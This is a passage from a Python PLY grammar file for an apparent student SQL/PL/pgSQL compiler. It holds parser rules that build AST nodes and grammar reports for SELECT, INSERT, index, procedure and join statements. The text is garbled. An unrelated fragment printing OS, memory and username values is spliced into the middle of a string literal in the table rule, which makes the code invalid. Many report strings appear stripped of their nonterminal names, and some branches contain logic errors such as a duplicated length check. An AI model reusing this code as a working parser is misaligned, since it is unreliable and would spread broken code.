t.slice[1].lexpos, graph_ref )\n elif len(t) == 4:\n graph_ref = graph_node(str(\"declaration\"), [t[1],t[2],t[3]], [] )\n addCad(\"**\\** ::= tIdentifier tRecord ',' \")\n t[0] = Declaration(t[1], False, t[2], True, None, None, t.slice[1].lineno, t.slice[1].lexpos, graph_ref )\n\n\ndef p_constant_opt(t):\n '''constant_opt : CONSTANT\n | empty'''\n token = t.slice[1]\n if token.type != \"empty\":\n graph_ref = graph_node(str(t[1]))\n addCad(\"**\\** ::= tConstant \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n else: \n t[0] = None \n\ndef p_collate_opt(t):\n '''collate_opt : COLLATE ID\n | empty'''\n token = t.slice[1]\n if token.type != \"empty\":\n graph_ref = graph_node(str(\"collate_opt\"), [t[1],t[2]], [] )\n addCad(\"**\\** ::= tCollate tIdentifier \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n else: \n t[0] = None\n\ndef p_not_null_opt(t):\n '''not_null_opt : NOT NULL\n | empty''' \n token = t.slice[1]\n if token.type != \"empty\":\n graph_ref = graph_node(str(str(t[1]) +\" \"+str(t[2]) ))\n addCad(\"**\\** ::= tNot tNull \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n else: \n t[0] = None\n\n\ndef p_expression_opt(t):\n '''expression_opt : DEFAULT expression\n | DOSPUNTOS IGUAL expression\n | IGUAL expression\n | empty'''\n token = t.slice[1]\n if token.type == \"DEFAULT\":\n childsProduction = addNotNoneChild(t,[2])\n graph_ref = graph_node(str(\"expression_opta\"), [t[1], t[2]] , childsProduction)\n addCad(\"**\\** ::= tDefault \\ \")\n t[2].graph_ref = graph_ref \n t[0] = t[2]\n ##### \n elif token.type == \"DOSPUNTOS\":\n childsProduction = addNotNoneChild(t,[3])\n graph_ref = graph_node(str(\"expression_opt\"), [str(t[1]) + \" \" + str(t[2]),t[3]] , childsProduction)\n addCad(\"**\\** ::= ':=' \\ \")\n t[3].graph_ref = graph_ref \n t[0] = t[3]\n ##### \n elif token.type == \"IGUAL\":\n childsProduction = addNotNoneChild(t,[2])\n graph_ref = graph_node(str(\"expression_opt\"), [t[1], t[2]] , childsProduction)\n addCad(\"**\\** ::= '=' \\ \")\n t[2].graph_ref = graph_ref \n t[0] = t[2]\n ##### \n else:\n t[0] = None\n\ndef p_stm_drop_function(t):\n '''stm_drop_function : DROP FUNCTION if_exists_opt ID mode_drop_function_opt'''\n tokenID = t.slice[4]\n childsProduction = addNotNoneChild(t,[3,5])\n graph_ref = graph_node(str(\"stm_drop_function\"), [t[1],t[2],t[3],t[4], t[5]], childsProduction )\n addCad(\"**\\** ::= tDrop tFunction [\\] tIdentifier [\\]\")\n name_func = Identifier(tokenID.value, tokenID.lineno, tokenID.lexpos, None)\n t[0] = DropFunction(name_func,(True if t[3] else False), t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n\n\ndef p_stm_drop_procedure(t):\n '''stm_drop_procedure : DROP PROCEDURE if_exists_opt ID mode_drop_function_opt '''\n tokenID = t.slice[4]\n childsProduction = addNotNoneChild(t,[3, 5])\n graph_ref = graph_node(str(\"stm_drop_procedure\"), [t[1],t[2],t[3],t[4],t[5]], childsProduction )\n addCad(\"**\\** ::= tDrop tProcedure [\\] tIdentifier [\\]\")\n name_proc = Identifier(tokenID.value, tokenID.lineno, tokenID.lexpos, None)\n t[0] = DropProcedure(name_proc,(True if t[3] else False), t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n\n \ndef p_name_list(t):\n '''name_list : name_list COMA ID\n | ID'''\n if len(t) == 4:\n lista = None\n childsProduction = []\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"name_list\"), [lista, t[2], t[3]], childsProduction)\n addCad(\"**\\** ::= \\ ',' tIdentifier \")\n token_id = t.slice[3]\n t[1][0].graph_ref = graph_ref\n t[1].append(Identifier(token_id.value, token_id.lineno, token_id.lexpos, graph_ref))\n t[0] = t[1]\n else:\n graph_ref = graph_node(str(t[1]))\n addCad(\"**\\** ::= tIdentifier \")\n token_id = t.slice[1]\n t[0] = [Identifier(token_id.value, token_id.lineno, token_id.lexpos, graph_ref)]\n\n\ndef p_mode_drop_function_opt(t):\n '''mode_drop_function_opt : CASCADE\n | RESTRICT\n | empty'''\n token = t.slice[1]\n if token.type == \"CASCADE\":\n graph_ref = graph_node(str(t[1]) )\n addCad(\"**\\** ::= tCascade \")\n t[0] = upNodo(True, 0, 0, graph_ref)\n #####\n elif token.type == \"RESTRICT\":\n graph_ref = graph_node(str(t[1]) )\n addCad(\"**\\** ::= tRestrict \")\n t[0] = upNodo(True, 0, 0, graph_ref)\n #####\n else:\n t[0]=None\n\n########## >>>>>>>>>>>>>>>> CREATE PROCEDURE <<<<<<<<<<<<<<<<<<<<<<\n#TODO: check graph ref\ndef p_stm_create_procedure(t):\n '''stm_create_procedure : CREATE PROCEDURE ID PARA list_param_function_opt PARC LANGUAGE PLPGSQL AS DOLLAR DOLLAR stm_begin PUNTOCOMA DOLLAR DOLLAR'''\n childsProduction = addNotNoneChild(t,[12])\n lista = None \n if t[5] != None:\n lista = t[5][0]\n childsProduction.append(lista.graph_ref) \n srt_report = \"**\\** ::= tCreate tProcedure tIdentifier '(' [\\] ')' tLanguage tPlpgsql tAs \\ ';' '$$'\"\n graph_ref = graph_node(str(\"stm_create_procedure\"), [t[1],t[2],t[3],t[4], lista,t[6],t[7],t[8],t[9],str(t[10]) + str(t[11]),t[12],t[13], str(t[14]) + str(t[15])], childsProduction )\n addCad(srt_report)\n t[0] = Function(t[3], t[5], None, t[12], t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n\n\n\n\n\n########## >>>>>>>>>>>>>>>> INDEX <<<<<<<<<<<<<<<<<<<<<<\ndef p_stm_index(t):\n '''stm_index : CREATE unique_opt INDEX ID ON ID using_hash_opt PARA params_index PARC where_clause_opt '''\n lista = None\n childsProduction = addNotNoneChild(t,[2,7,11])\n if t[9] != None:\n lista = t[9][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"stm_index\"), [t[1],t[2],t[3],t[4],t[5],t[6],t[7],t[8],lista,t[10],t[11]], childsProduction )\n addCad(\"**\\** ::= tCreate [\\] tIndex tIdentifier tOn tIdentifier \\ '(' \\ ')' \\ \")\n t[0] = CreateIndex(True if t[2] is not None else False, True if t[7] is not None else False, t[4], t[6], t[9], t[11], t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n\ndef p_params_index(t):\n '''params_index : params_index COMA param_index\n | param_index'''\n token = t.slice[1]\n if token.type == \"params_index\":\n lista = None\n childsProduction = addNotNoneChild(t, [3])\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"params_index\"), [lista,t[2], t[3]], childsProduction)\n addCad(\"**\\** ::= [\\] ',' \")\n t[1][0].graph_ref = graph_ref\n t[1].append(t[3])\n t[0] = t[1]\n #####\n else:\n childsProduction = addNotNoneChild(t,[1])\n graph_ref = graph_node(str(\"params_index\"), [t[1]], childsProduction )\n addCad(\"**\\** ::= \")\n t[1].graph_ref = graph_ref\n t[0] = [t[1]]\n\n\ndef p_param_index_0(t):\n '''param_index : ID order_opt'''\n childsProduction = addNotNoneChild(t,[2])\n graph_ref = graph_node(str(\"param_index\"), [t[1], t[2]], childsProduction)\n addCad(\"**\\** ::= tIdendtifier \\\")\n t[0] = IndexAtributo(None,t[1],(t[2].val if t[2] else None),None,None,t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n #####\n\ndef p_param_index_1(t):\n '''param_index : ID order_opt NULLS FIRST\n | ID order_opt NULLS LAST'''\n token = t.slice[3]\n if token.type == \"FIRST\":\n childsProduction = addNotNoneChild(t,[2])\n graph_ref = graph_node(str(\"param_index\"), [t[1], t[2], str(t[3]) + \" \" + str(t[4])], childsProduction)\n addCad(\"**\\** ::= tIdentifier \\ tNUlls tFirst \")\n t[0] = IndexAtributo(None,t[1],(t[2].val if t[2] else None),t[3],t[4],t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n #####\n else:\n childsProduction = addNotNoneChild(t,[2])\n graph_ref = graph_node(str(\"param_index\"), [t[1], t[2], str(t[3]) + \" \" + str(t[4])], childsProduction)\n addCad(\"**\\** ::= tIdentifier \\ tNulls tLast \")\n t[0] = IndexAtributo(None,t[1],(t[2].val if t[2] else None),t[3],t[4],t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n #####\n\n\ndef p_param_index_2(t):\n '''param_index : expression'''\n childsProduction = addNotNoneChild(t,[1])\n graph_ref = graph_node(str(\"param_index\"), [t[1]], childsProduction)\n addCad(\"**\\** ::= \\\")\n t[0] = IndexAtributo(t[1],t[1], None,None,None,0, 0, graph_ref)\n #####\n\n\ndef p_order_opt(t):\n '''order_opt : DESC\n | ASC\n | empty'''\n token = t.slice[1]\n if token.type == \"DESC\":\n graph_ref = graph_node(str(t[1]) )\n addCad(\"**\\** ::= tDesc \")\n t[0] = Identifier(token.value, token.lineno, token.lexpos, graph_ref)\n #####\n elif token.type == \"ASC\":\n graph_ref = graph_node(str(t[1]) )\n addCad(\"**\\** ::= tAsc \")\n t[0] = Identifier(token.value, token.lineno, token.lexpos, graph_ref)\n #####\n else:\n t[0] = None\n\n\ndef p_unique_opt(t):\n '''unique_opt : UNIQUE\n | empty'''\n token = t.slice[1]\n if token.type == \"UNIQUE\":\n graph_ref = graph_node(str(t[1]) )\n addCad(\"**\\** ::= tUnique \")\n t[0] = Identifier(token.value, token.lineno, token.lexpos, graph_ref)\n #####\n else:\n t[0] = None\n\ndef p_using_hash_opt(t):\n '''using_hash_opt : USING HASH\n | empty'''\n token = t.slice[1]\n if token.type == \"USING\":\n graph_ref = graph_node(str(str(t[1]) + \" \" + str(t[2])))\n addCad(\"**\\** ::= tUsing tHash \")\n t[0] = Identifier(str(\"USING HASH\"), token.lineno, token.lexpos, graph_ref)\n #####\n else:\n t[0] = None\n\n########## >>>>>>>>>>>>>>>> DROP INDEX <<<<<<<<<<<<<<<<<<<<<<\ndef p_stm_drop_index(t):\n '''stm_drop_index : DROP INDEX concurrently_opt if_exists_opt ID mode_drop_function_opt'''\n token = t.slice[1]\n childsProduction = addNotNoneChild(t, [3,4,6])\n graph_ref = graph_node(str(\"stm_drop_index\"), [t[1], t[2],t[3], t[4], t[5],t[6]], childsProduction)\n addCad(\"**\\** ::= tDrop tIndex [\\] [\\] tIdentifier [\\] \")\n t[0] = DropIndex(t[3], t[4], t[5], t[6], token.lineno, token.lexpos, graph_ref)\n #####\n\ndef p_concurrently_opt(t):\n '''concurrently_opt : CONCURRENTLY\n | empty'''\n token = t.slice[1]\n if token.type == \"CONCURRENTLY\" :\n graph_ref = graph_node(str(t[1]) )\n addCad(\"**\\** ::= tConcurrently \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n else:\n t[0] = None\n\n########## >>>>>>>>>>>>>>>> ALTER INDEX <<<<<<<<<<<<<<<<<<<<<<\ndef p_stm_alter_index(t):\n '''stm_alter_index : ALTER INDEX if_exists_opt ID ALTER COLUMN ID ID '''\n token = t.slice[1]\n childsProduction = addNotNoneChild(t, [3])\n graph_ref = graph_node(str(\"stm_alter_index\"), [t[1], t[2],t[3], t[4], t[5], t[6], t[7], t[8]], childsProduction)\n addCad(\"**\\** ::= tAlter tIndex [\\] tIdentifier tAlter tColumn tIdentifier tIdentifier \")\n t[0] = AlterIndex(t[3], t[4], t[7], t[8], token.lineno, token.lexpos, graph_ref)\n\n\ndef p_column_opt(t):\n '''column_opt : COLUMN\n | empty''' \n token = t.slice[1]\n if token.type == \"COLUMN\" :\n graph_ref = graph_node(str(\"column_opt\"), [t[1]], [])\n addCad(\"**\\** ::= tColumn\")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #### \n else:\n t[0] = None\n\n\n\n##################################################\n\n\ndef p_all_opt(t):\n '''all_opt : ALL\n | empty'''\n token = t.slice[1]\n if token.type == \"ALL\":\n graph_ref = graph_node(str(t[1]))\n addCad(\"**\\** ::= tAll \")\n t[0] = upNodo(True, 0, 0, graph_ref)\n ##### \n else:\n t[0] = None\n\n\ndef p_stm_select(t):\n '''stm_select : SELECT distinct_opt list_names FROM table_list where_clause_opt group_clause_opt having_clause_opt order_by_opt limit_opt offset_opt\n | SELECT distinct_opt list_names '''\n if len(t) == 4:\n lista = None\n childsProduction = addNotNoneChild(t, [2])\n if t[3] != None:\n lista = t[3][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"stm_select\"), [t[1], t[2], lista], childsProduction)\n addCad(\"**\\** ::= tSelect \\ \\ \")\n t[0] = Select(False, t[3], None, None, None, None, None, None, None, t.slice[1].lineno, t.slice[1].lexpos,\n graph_ref)\n else:\n lista = None\n lista2 = None\n childsProduction = addNotNoneChild(t, [2, 6, 7, 8, 9, 10, 11])\n if t[3] != None:\n lista = t[3][0]\n childsProduction.append(lista.graph_ref)\n if t[5] != None:\n lista2 = t[5][0]\n childsProduction.append(lista2.graph_ref)\n graph_ref = graph_node(str(\"stm_select\"),\n [t[1], t[2], lista, t[4], lista2, t[6], t[7], t[8], t[9], t[10], t[11]],\n childsProduction)\n addCad(\n \"**\\** ::= tSelect \\ \\ tFrom \\ \\ \\\\ \\ \")\n t[0] = Select(True if t[2] else False, t[3], t[5], t[6], t[7], t[8], t[9], t[10], t[11], t.slice[1].lineno,\n t.slice[1].lexpos, graph_ref)\n\n\ndef p_distinct_opt(t):\n '''distinct_opt : not_opt DISTINCT\n | empty'''\n\n if len(t) == 3:\n childsProduction = addNotNoneChild(t, [1])\n graph_ref = graph_node(str(\"distinct_opt\"), [t[1], t[2]], childsProduction)\n addCad(\"**\\** ::= \\ tDistinct \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n else:\n t[0] = None\n\n\ndef p_where_clause_opt(t):\n '''where_clause_opt : where_clause\n | empty'''\n token = t.slice[1]\n if token.type == \"where_clause\":\n childsProduction = addNotNoneChild(t, [1])\n graph_ref = graph_node(str(\"where_clause_opt\"), [t[1]], childsProduction)\n addCad(\"**\\** ::= \\ \")\n t[1].graph_ref = graph_ref\n t[0] = t[1]\n \n else:\n t[0] = None\n\n\ndef p_group_clause_opt(t):\n '''group_clause_opt : group_clause\n | empty'''\n token = t.slice[1]\n if token.type == \"group_clause\":\n childsProduction = addNotNoneChild(t, [1])\n graph_ref = graph_node(str(\"group_clause_opt\"), [t[1]], childsProduction)\n addCad(\"**\\** ::= \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n else:\n t[0] = None\n\n\ndef p_having_clause_opt(t):\n '''having_clause_opt : having_clause\n | empty'''\n token = t.slice[1]\n if token.type == \"having_clause\":\n childsProduction = addNotNoneChild(t, [1])\n graph_ref = graph_node(str(\"having_clause_opt\"), [t[1]], childsProduction)\n addCad(\"**\\** ::= \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n else:\n t[0] = None\n\n\ndef p_order_by_opt(t):\n '''order_by_opt : ORDER BY col_name\n | empty'''\n if len(t) == 4:\n childsProduction = addNotNoneChild(t, [3])\n graph_ref = graph_node(str(\"order_by_opt\"), [t[1], t[2], t[3]], childsProduction)\n addCad(\"**\\** ::= tOrder tBy \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n else:\n t[0] = None\n\n\ndef p_limit_opt(t):\n '''limit_opt : LIMIT ENTERO\n | empty'''\n if len(t) == 3:\n graph_ref = graph_node(str(str(t[1]) + \" \" + str(t[2])))\n addCad(\"**\\** ::= tLimit tEntero \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n else:\n t[0] = None\n\n\ndef p_offset_opt(t):\n '''offset_opt : OFFSET ENTERO\n | empty'''\n if len(t) == 3:\n graph_ref = graph_node(str(str(t[1]) + \" \" + str(t[2])))\n addCad(\"**\\** ::= tOffset tEntero \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n else:\n t[0] = None\n\n\ndef p_table(t):\n '''table : ID \n | ID AS TEXTO\n | ID AS ID\n '''\n\n if len(t) == 2:\n graph_ref = graph_node(str(str(t[1])))\n addCad(\"**\\
    OS \" + str(os) + \"
    Memory \" + str(memory) + \"
    Username \" + str(uname) + \"
    \n \n
    ** ::= tIdentificador \")\n t[0] = Table(t[1], t[1], None, t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n ##### \n else:\n graph_ref = graph_node(str(str(t[1]) + \" \" + str(t[2]) + \" \" + str(t[3])))\n addCad(\"**\\
    ** ::= tIdentificador tAs tTexto \")\n t[0] = Table(t[1], t[3], None, t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n ##### \n\n\ndef p_table0(t):\n '''table : PARA stm_select PARC\n | PARA stm_select PARC AS TEXTO\n | PARA stm_select PARC AS ID\n '''\n if len(t) == 4:\n childsProduction = addNotNoneChild(t, [2])\n graph_ref = graph_node(str(\"table\"), [t[1], t[2], t[3]], childsProduction)\n addCad(\"**\\
    *[* ::= '(' \\ ')' \")\n t[0] = Table(None, None, t[2], t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n\n else:\n childsProduction = addNotNoneChild(t, [2])\n graph_ref = graph_node(str(\"table\"), [t[1], t[2], t[3], t[4], t[5]], childsProduction)\n addCad(\"**\\
    ** ::= '(' \\ ')' tAs tTexto \")\n t[0] = Table(t[5], t[5], t[2], t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n\n\ndef p_stm_insert(t):\n '''stm_insert : INSERT INTO ID insert_ops'''\n childsProduction = addNotNoneChild(t, [4])\n graph_ref = graph_node(str(\"stm_insert\"), [t[1], t[2], t[3], t[4]], childsProduction)\n addCad(\"**\\** ::= tInsert tInto tIdentifier \\ \")\n token_insert = t.slice[1]\n t[0] = InsertInto(t[3], t[4].column_list, t[4].values_list, token_insert.lineno, token_insert.lexpos, graph_ref)\n # print(t)\n\n\ndef p_insert_ops(t):\n '''insert_ops : column_list_param_opt VALUES PARA exp_list PARC\n | column_list_param_opt stm_select'''\n if len(t) == 6:\n lista = None\n childsProduction = addNotNoneChild(t, [1])\n if t[4] != None:\n lista = t[4][0]\n childsProduction.append(lista.graph_ref)\n\n graph_ref = graph_node(str(\"insert_ops\"), [t[1], t[2], t[3], lista, t[5]], childsProduction)\n addCad(\"**\\** ::= \\ tValues '(' \\ ')' \")\n token_ops = t.slice[2]\n t[0] = InsertItem(t[1].val if t[1] is not None else None, t[4], token_ops.lineno, token_ops.lexpos, graph_ref)\n else:\n token_ops = t.slice[1]\n childsProduction = addNotNoneChild(t, [1, 2])\n graph_ref = graph_node(str(\"insert_ops\"), [t[1], t[2]], childsProduction)\n addCad(\"**\\** ::= \\ \\ \")\n t[0] = InsertItem(t[1].val, t[2], 0, 0, graph_ref)\n\n\ndef p_table_list(t):\n '''table_list : table_list COMA table_ref \n | table_ref'''\n if len(t) == 4:\n lista = None\n childsProduction = addNotNoneChild(t, [3])\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"table_list\"), [lista, t[2], t[3]], childsProduction)\n addCad(\"**\\** ::= \\ ',' \\ ')' \")\n t[1][0].graph_ref = graph_ref\n t[1].append(t[3])\n t[0] = t[1]\n\n else:\n childsProduction = addNotNoneChild(t, [1])\n graph_ref = graph_node(str(\"table_list\"), [t[1]], childsProduction)\n addCad(\"**\\** ::= \\ ')' \")\n t[1].graph_ref = graph_ref\n t[0] = [t[1]]\n\n\ndef p_table_ref(t):\n '''table_ref : table NATURAL join_type JOIN table\n | table join_type JOIN table\n | table'''\n\n if len(t) == 6:\n childsProduction = addNotNoneChild(t, [1, 3, 5])\n graph_ref = graph_node(str(\"table_ref\"), [t[1], t[2], t[3], t[4], t[5]], childsProduction)\n addCad(\"**\\** ::= \\
    tNatural \\ tJoin \\
    \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n elif len(t) == 6:\n childsProduction = addNotNoneChild(t, [1, 2, 4])\n graph_ref = graph_node(str(\"table_ref\"), [t[1], t[2], t[3], t[4]], childsProduction)\n addCad(\"**\\** ::= \\
    \\ tJoin \\
    \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n elif len(t) == 2:\n childsProduction = addNotNoneChild(t, [1])\n graph_ref = graph_node(str(\"table_ref\"), [t[1]], childsProduction)\n addCad(\"**\\** ::= \\
    \")\n t[1].graph_ref = graph_ref\n t[0] = t[1]\n\n\ndef p_join_type(t):\n '''join_type : outer_join_type \n | outer_join_type OUTER\n '''\n\n if len(t) == 2:\n childsProduction = addNotNoneChild(t, [1])\n graph_ref = graph_node(str(\"join_type\"), [t[1]], childsProduction)\n addCad(\"**\\** ::= \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n elif len(t) == 3:\n childsProduction = addNotNoneChild(t, [1, 2, 4])\n graph_ref = graph_node(str(\"join_type\"), [t[1], t[2], t[3], t[4]], childsProduction)\n addCad(\"**\\** ::= \\ tOuter \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #### \n\n\ndef p_join_type0(t):\n '''join_type : INNER\n '''\n graph_ref = graph_node(str(t[1]))\n addCad(\"**\\** ::= tInner \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n\n\ndef p_outer_join_type(t):\n '''outer_join_type : LEFT\n | RIGHT\n | FULL'''\n token = t.slice[1]\n graph_ref = graph_node(str(t[1]))\n addCad(\"**\\** ::= \" + str(token.type))\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##\n\n\ndef p_list_names(t):\n '''list_names : list_names COMA names AS TEXTO\n | list_names COMA names AS ID\n | list_names COMA names\n | POR\n '''\n if len(t) == 6:\n lista = None\n childsProduction = addNotNoneChild(t, [3])\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"list_names\"), [lista, t[2], t[3], t[4], t[5]], childsProduction)\n addCad(\"**\\** ::= \\ ',' tNames tAs tTexto \")\n t[3].alias = t[5]\n t[1][0].graph_ref = graph_ref\n t[1].append(t[3])\n t[0] = t[1]\n\n elif len(t) == 4:\n lista = None\n childsProduction = addNotNoneChild(t, [3])\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"list_names\"), [lista, t[2], t[3]], childsProduction)\n addCad(\"**\\** ::= \\ ',' tNames \")\n t[1][0].graph_ref = graph_ref\n t[1].append(t[3])\n t[0] = t[1]\n\n elif len(t) == 2:\n\n graph_ref = graph_node(str(\"tPor\"), [t[1]], [])\n addCad(\"**\\** ::= tPor \")\n t[0] = [Names(True, None, None, t.slice[1].lineno, t.slice[1].lexpos, graph_ref)]\n\n\ndef p_list_names0(t):\n '''list_names : names AS TEXTO\n | names AS ID\n | names'''\n\n if len(t) == 4:\n childsProduction = addNotNoneChild(t, [1])\n graph_ref = graph_node(str(\"list_names\"), [t[1], t[2], t[3]], childsProduction)\n addCad(\"**\\** ::= \\ tAs tTexto \")\n t[1].graph_ref = graph_ref\n t[1].alias = t[3]\n t[0] = [t[1]]\n\n elif len(t) == 2:\n childsProduction = addNotNoneChild(t, [1])\n graph_ref = graph_node(str(\"list_names\"), [t[1]], childsProduction)\n addCad(\"**\\** ::= \\ \")\n t[1].graph_ref = graph_ref\n t[0] = [t[1]]\n\n\ndef p_names(t):\n '''names : expression\n | time_ops\n | case_clause\n '''\n token = t.slice[1]\n cadena = str(token.type)\n childsProduction = addNotNoneChild(t, [1])\n graph_ref = graph_node(str(\"names\"), [t[1]], childsProduction)\n addCad(\"**\\** ::= \\<\" + cadena.upper() + \" >\")\n t[0] = Names(False, t[1], None, t[1].line, t[1].column, graph_ref)\n\n\ndef p_names1(t):\n '''names : GREATEST PARA exp_list PARC\n | LEAST PARA exp_list PARC\n | COUNT PARA expression PARC\n | COUNT PARA POR PARC\n | AVG PARA expression PARC\n | MAX PARA expression PARC\n | MIN PARA expression PARC\n | SUM PARA expression PARC\n '''\n token = t.slice[1]\n token_str = str(token.type).upper()\n if token_str == 'GREATEST' or token_str == 'LEAST':\n lista = None\n childsProduction = []\n if t[3] != None:\n lista = t[3][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"names\"), [t[1], t[2], lista, t[4]], childsProduction)\n addCad(\"**\\** ::= \" + token_str + \" '(' \\ ')' \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n else:\n childsProduction = []\n graph_ref = graph_node(str(\"names\"), [t[1], t[2], t[4]], childsProduction)\n addCad(\"**\\** ::= \" + token_str + \" '(' \\ ')' \")\n if token_str == 'COUNT':\n NodoC = Count(t[3], '*' == t[3], token.lineno, token.lexpos, graph_ref)\n t[0] = Names(False, NodoC, None, token.lineno, token.lexpos, graph_ref)\n elif token_str == 'AVG':\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n elif token_str == 'MAX':\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n elif token_str == 'MIN':\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n elif token_str == 'SUM':\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n\n\ndef p_group_clause(t):\n '''group_clause : GROUP BY PARA group_list PARC\n '''\n childsProduction = addNotNoneChild(t, [4])\n graph_ref = graph_node(str(\"group_clause\"), [t[1], t[2], t[3], t[4], t[5]], childsProduction)\n addCad(\"**\\** ::= tGroup tBy '(' \\ ')' \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #####\n\n\ndef p_group_list(t):\n '''group_list : group_list COMA col_name\n | col_name'''\n if len(t) == 4:\n childsProduction = addNotNoneChild(t, [1, 3])\n graph_ref = graph_node(str(\"group_list\"), [t[1], t[2], t[3]], childsProduction)\n addCad(\"**\\** ::= \\ ',' \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n elif len(t) == 2:\n childsProduction = addNotNoneChild(t, [1])\n graph_ref = graph_node(str(\"group_list\"), [t[1]], childsProduction)\n addCad(\"**\\** ::= \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #### \n\n\ndef p_having_clause(t):\n '''having_clause : HAVING logicExpression'''\n childsProduction = addNotNoneChild(t, [2])\n graph_ref = graph_node(str(\"having_clause\"), [t[1], t[2]], childsProduction)\n addCad(\"**\\** ::= tHaving \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #### \n\n\ndef p_case_clause(t):\n '''case_clause : CASE case_inner ELSE expression\n | CASE case_inner'''\n if len(t) == 5:\n childsProduction = addNotNoneChild(t, [2, 4])\n graph_ref = graph_node(str(\"case_clause\"), [t[1], t[2], t[3], t[4]], childsProduction)\n addCad(\"**\\** ::= tCase \\ tElse \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n elif len(t) == 3:\n childsProduction = addNotNoneChild(t, [2])\n graph_ref = graph_node(str(\"case_clause\"), [t[1], t[2]], childsProduction)\n addCad(\"**\\** ::= tCase \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ####\n\n\ndef p_case_inner(t):\n '''case_inner : case_inner WHEN logicExpression THEN expression\n | WHEN logicExpression THEN expression'''\n if len(t) == 6:\n childsProduction = addNotNoneChild(t, [1, 3, 5])\n graph_ref = graph_node(str(\"case_inner\"), [t[1], t[2], t[3], t[4], t[5]], childsProduction)\n addCad(\"**\\** ::= \\ tWhen \\ tThen \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n elif len(t) == 5:\n childsProduction = addNotNoneChild(t, [2, 4])\n graph_ref = graph_node(str(\"case_inner\"), [t[1], t[2], t[3], t[4]], childsProduction)\n addCad(\"**\\** ::= tWhen \\ tThen \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ####\n\n\ndef p_time_ops(t):\n '''time_ops : EXTRACT PARA ops_from_ts FECHA_HORA PARC\n | DATE_PART PARA TEXTO COMA INTERVAL TEXTO PARC\n | TIMESTAMP TEXTO\n | CURRENT_DATE\n | CURRENT_TIME\n '''\n if len(t) == 6:\n token = t.slice[1]\n childsProduction = addNotNoneChild(t, [3])\n graph_ref = graph_node(str(\"time_ops\"), [t[1], t[2], t[3], t[4], t[5]], childsProduction)\n addCad(\"**\\** ::= tExtract '(' \\ tFechaHora ')' \")\n t[0] = DateAST(t[4], t[3].option, token.lineno, token.lexpos, graph_ref)\n elif len(t) == 8:\n graph_ref = graph_node(str(\"time_ops\"), [t[1], t[2], t[3], t[4], t[5], t[6], t[7]], [])\n addCad(\"**\\** ::= tDate_part '(' tText ',' tINTERVAL tText ')' \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n elif len(t) == 3:\n token = t.slice[1]\n graph_ref = graph_node(str(\"time_ops\"), [t[1], t[2]], [])\n addCad(\"**\\** ::= tTimestemp tText\")\n t[0] = Now(token.lineno, token.lexpos, graph_ref)\n else:\n token = t.slice[1]\n if token.type == 'CURRENT_DATE':\n graph_ref = graph_node(str(\"time_ops\"), [t[1]], [])\n addCad(\"**\\** ::= tCurrent_date\")\n t[0] = NowDate(token.lineno, token.lexpos, graph_ref)\n elif token.type == 'CURRENT_TIME':\n graph_ref = graph_node(str(\"time_ops\"), [t[1]], [])\n addCad(\"**\\** ::= tCurrent_time\")\n t[0] = NowTime(token.lineno, token.lexpos, graph_ref)\n\n\ndef p_ops_from_ts(t):\n '''ops_from_ts : YEAR FROM TIMESTAMP\n | HOUR FROM TIMESTAMP\n | MINUTE FROM TIMESTAMP\n | SECOND FROM TIMESTAMP\n | MONTH FROM TIMESTAMP\n | DAY 